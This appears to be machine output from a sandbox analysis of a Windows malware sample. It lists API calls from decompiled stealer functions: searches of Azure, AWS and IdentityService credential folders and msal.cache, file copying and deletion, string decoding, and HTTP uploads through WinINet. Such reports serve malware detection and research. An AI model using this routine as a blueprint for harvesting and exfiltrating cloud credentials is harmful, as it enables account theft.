                                        • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                        • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                        • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                        • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                      • strtok_s.MSVCRT ref: 022E0582
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022E05C9
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022E05D0
                                      • StrStrA.SHLWAPI(00000000,00421618), ref: 022E05EC
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E05FA
                                        • Part of subcall function 022E8B47: malloc.MSVCRT ref: 022E8B4F
                                        • Part of subcall function 022E8B47: strncpy.MSVCRT ref: 022E8B6A
                                      • StrStrA.SHLWAPI(00000000,00421620), ref: 022E0636
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0644
                                      • StrStrA.SHLWAPI(00000000,00421628), ref: 022E0680
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E068E
                                      • StrStrA.SHLWAPI(00000000,00421630), ref: 022E06CA
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E06DC
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0769
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0781
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0799
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E07B1
                                      • lstrcat.KERNEL32(?,0042164C), ref: 022E07C9
                                      • lstrcat.KERNEL32(?,00421660), ref: 022E07D8
                                      • lstrcat.KERNEL32(?,00421670), ref: 022E07E7
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E07FA
                                      • lstrcat.KERNEL32(?,00421678), ref: 022E0809
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E081C
                                      • lstrcat.KERNEL32(?,0042167C), ref: 022E082B
                                      • lstrcat.KERNEL32(?,00421680), ref: 022E083A
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E084D
                                      • lstrcat.KERNEL32(?,00421688), ref: 022E085C
                                      • lstrcat.KERNEL32(?,0042168C), ref: 022E086B
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E087E
                                      • lstrcat.KERNEL32(?,00421698), ref: 022E088D
                                      • lstrcat.KERNEL32(?,0042169C), ref: 022E089C
                                      • strtok_s.MSVCRT ref: 022E08E0
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E08F5
                                      • memset.MSVCRT ref: 022E0944
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                      • String ID:
                                      • API String ID: 3689735781-0
                                      • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                      • Instruction ID: c70e8987a47bc3c3ee0f4c1b7c5d73c25ddfd72a9a95e22a47af87f929006125
                                      • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                      • Instruction Fuzzy Hash: 3FD14C75A20308ABCF04EBE4DD85EFE777AAF54300F904419E103A6198EE78AA45DF61
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                      • StrCmpCA.SHLWAPI(?,006C0DE0), ref: 00405A13
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,006C0ED0,00000000,?,006897C0,00000000,?,00421A1C), ref: 00405E71
                                      • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                      • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                      • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                      • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                      • memcpy.MSVCRT(?), ref: 00405EFE
                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                      • HttpOpenRequestA.WININET(00000000,006C0E80,?,006C04D0,00000000,00000000,00400100,00000000), ref: 00405BF8
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------$l
                                      • API String ID: 1406981993-1660133265
                                      • Opcode ID: 5a3a4c6f642c51d95aedfef3bc05ad6ab1327865178b1c6bba112ca90ce5864b
                                      • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                      • Opcode Fuzzy Hash: 5a3a4c6f642c51d95aedfef3bc05ad6ab1327865178b1c6bba112ca90ce5864b
                                      • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                      APIs
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                        • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                        • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022D5C5F
                                      • StrCmpCA.SHLWAPI(?,l), ref: 022D5C7A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D5DFA
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022D60D8
                                      • lstrlen.KERNEL32(00000000), ref: 022D60E9
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 022D60FA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022D6101
                                      • lstrlen.KERNEL32(00000000), ref: 022D6116
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 022D612D
                                      • lstrlen.KERNEL32(00000000), ref: 022D613F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022D6158
                                      • memcpy.MSVCRT(?), ref: 022D6165
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 022D6182
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022D6196
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022D61B3
                                      • InternetCloseHandle.WININET(00000000), ref: 022D6217
                                      • InternetCloseHandle.WININET(00000000), ref: 022D6224
                                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D5E5F
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                      • InternetCloseHandle.WININET(00000000), ref: 022D622E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                      • String ID: l
                                      • API String ID: 1703137719-362530722
                                      • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                      • Instruction ID: a9242f6e855a41c5ae0169ec2983eb5f566070e44f36976ba87d8ea55160db85
                                      • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                      • Instruction Fuzzy Hash: 4F12BA71960328AACF15EBE4DD95EEEB37ABF64700F804199A10762194EF742B88DF50
                                      APIs
                                      • memset.MSVCRT ref: 00414D87
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • memset.MSVCRT ref: 00414E13
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      • memset.MSVCRT ref: 00414E9F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,006C0F90,?,000003E8), ref: 00414A4A
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                      • memset.MSVCRT ref: 00414F2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                      • API String ID: 4017274736-156832076
                                      • Opcode ID: 7769cd15d224279b6a8c431d0011313115eb2ccd46c8e18735444d99bbb5ff41
                                      • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                      • Opcode Fuzzy Hash: 7769cd15d224279b6a8c431d0011313115eb2ccd46c8e18735444d99bbb5ff41
                                      • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00689760,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                      • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                      • lstrcatA.KERNEL32(?,00000000,00690130,00421474,00690130,00421470,00000000), ref: 0040D208
                                      • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                      • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                      • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                      • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                      • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                      • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                      • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00690100,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      • lstrlenA.KERNEL32(?), ref: 0040D32A
                                      • lstrlenA.KERNEL32(?), ref: 0040D339
                                      • memset.MSVCRT ref: 0040D388
                                        • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 2775534915-0
                                      • Opcode ID: 53bd777a164c53d73cfd4da9e271e087aec51a26bbdffb0079736ca23cb72688
                                      • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                      • Opcode Fuzzy Hash: 53bd777a164c53d73cfd4da9e271e087aec51a26bbdffb0079736ca23cb72688
                                      • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DD1EA
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022DD32E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022DD335
                                      • lstrcat.KERNEL32(?,00000000), ref: 022DD46F
                                      • lstrcat.KERNEL32(?,00421478), ref: 022DD47E
                                      • lstrcat.KERNEL32(?,00000000), ref: 022DD491
                                      • lstrcat.KERNEL32(?,0042147C), ref: 022DD4A0
                                      • lstrcat.KERNEL32(?,00000000), ref: 022DD4B3
                                      • lstrcat.KERNEL32(?,00421480), ref: 022DD4C2
                                      • lstrcat.KERNEL32(?,00000000), ref: 022DD4D5
                                      • lstrcat.KERNEL32(?,00421484), ref: 022DD4E4
                                      • lstrcat.KERNEL32(?,00000000), ref: 022DD4F7
                                      • lstrcat.KERNEL32(?,00421488), ref: 022DD506
                                      • lstrcat.KERNEL32(?,00000000), ref: 022DD519
                                      • lstrcat.KERNEL32(?,0042148C), ref: 022DD528
                                      • lstrcat.KERNEL32(?,00000000), ref: 022DD53B
                                      • lstrcat.KERNEL32(?,00421490), ref: 022DD54A
                                        • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                        • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                      • lstrlen.KERNEL32(?), ref: 022DD591
                                      • lstrlen.KERNEL32(?), ref: 022DD5A0
                                      • memset.MSVCRT ref: 022DD5EF
                                        • Part of subcall function 022EACD7: StrCmpCA.SHLWAPI(0064A350,022DAA0E,?,022DAA0E,0064A350), ref: 022EACF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 022DD61B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 1973479514-0
                                      • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                      • Instruction ID: beaf0747bffc27c3fc1b1a3eea6341950931f12f600e6f84c59043fa2ccd1e59
                                      • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                      • Instruction Fuzzy Hash: 8CE14B75960308ABCF08FBE4DD95EEE737ABF64301F904159E107A61A4DE34AA08DF61
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006BF408,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                      • StrStrA.SHLWAPI(?,006BF480,00420B52), ref: 0040CAF7
                                      • StrStrA.SHLWAPI(00000000,006BF3F0), ref: 0040CB1E
                                      • StrStrA.SHLWAPI(?,006C0000,00000000,?,00421458,00000000,?,00000000,00000000,?,006900A0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                      • StrStrA.SHLWAPI(00000000,006C0080), ref: 0040CCB9
                                        • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                        • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00690080), ref: 0040C871
                                        • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                        • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                      • StrStrA.SHLWAPI(?,006C0080,00000000,?,0042145C,00000000,?,00000000,00690080), ref: 0040CD5A
                                      • StrStrA.SHLWAPI(00000000,0068FEF0), ref: 0040CD71
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                      • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                      • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 3555725114-3916222277
                                      • Opcode ID: 7ebf70302f9c6978d5b17e417954d9c1afb0afdf58622d108c0dd4a829574462
                                      • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                      • Opcode Fuzzy Hash: 7ebf70302f9c6978d5b17e417954d9c1afb0afdf58622d108c0dd4a829574462
                                      • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022DCCD3
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022DCCF0
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 022DCCFC
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022DCD0F
                                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022DCD1C
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022DCD40
